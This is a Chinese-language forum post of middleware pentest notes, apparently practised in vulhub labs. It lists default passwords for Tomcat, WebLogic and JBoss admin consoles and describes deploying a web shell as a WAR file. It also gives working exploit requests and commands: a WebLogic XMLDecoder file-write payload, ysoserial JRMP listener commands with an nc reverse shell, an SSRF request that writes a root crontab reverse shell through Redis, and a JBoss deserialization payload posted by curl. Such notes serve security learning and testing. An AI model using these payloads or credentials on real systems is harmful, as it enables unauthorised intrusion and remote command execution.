周末陪陪家人
记录下一些中间件测试常见步骤

Tomcat

开始安装ubuntu,用sudo passwd root设置root密码,运行p神的vulhub时用root运行成功.

Tomcat7弱口令上传rar

sudo docker ps #查看启动的docker

http://127.0.0.1:8080/manager/html 口令tomcat
ma.jsp文件打包为zip改后缀名为ma.war,deploy后访问http://127.0.0.1:8080/ma/ma.jsp

root/root
    tomcat/tomcat 
    admin admin
    admin 123456

Tomcat5-9 PUT写文件

curl -X PUT http://127.0.0.1:port/test.jsp/ -d @- < test.jsp


https://github.com/breaktoprotect/CVE-2017-12615
https://github.com/iBearcat/CVE-2017-12615

Weblogic

http://127.0.0.1:7001/console

弱口令

常见弱口令

weblogic    weblogic 或Oracle@123
    system      system
    portaladmin portaladmin
    guest       guest

部署-安装-上载文件ma.war(ma.jsp打包为ma.zip改名为ma.war)
访问127.0.0.1:7001/ma/ma.jsp 例子的目录命名为ma

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞

写shell地址 http://127.0.0.1:7001/bea_wls_internal/test.jsp
burp发送即可

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Weblogic 10.3.6.0 && 12.1.3.0 && 12.2.1.2 && 12.2.1.3

poc
攻击者使被攻击主机请求JRMPListener主机(恶意payload),并执行
利用:
在JRMPListener主机上运行以下命令:

wget https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener [监听端口] CommonsCollections1 [执行命令]

    例子:java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 反弹ip 反弹端口'

监听

nc -lvvp 6666

运行

python CVE-2018-2628.py

Weblogic 10.0.2 -- 10.3.6 ssrf

burp发包,探测端口

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

不存在则返回could not connect
Redis反弹shell

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

JBOSS

默认后台
http://localhost:8080

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

工具下载地址 http://scan.javasec.cn/java/JavaDeserH2HC.zip

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //生成一个ReverseShellCommonsCollectionsHashMap.ser二进制文件
nc -l -vv 9999
curl http://192.168.1.109:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser


弱口令 getshell过程  

admin:admin
以下引用Nmask:
  访问管理页面,查看jboss配置页面中的JMX Console,这是JBoss的管理台程序,进入后找到Jboss.deployment包,该包下有flavor=URL.type=DeploymentSccanner选项。进入部署页面后便可以上传war文件,但与tomcat不同的是它不是本地上传war文件,而是从远程地址下载,因此需要自己准备一个文件服务器,用于远程下载war到目标jboss服务器上。具体方法是在部署页面找到”ADDURL”方法,输入URL地址,点击invoke。除了以上方法外,JMX-Console提供的BSH方法,同样也可以部署war包。

JBoss JMXInvokerServlet 反序列化漏洞

tools https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

Reference

https://github.com/vulhub

点击收藏 | 1 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖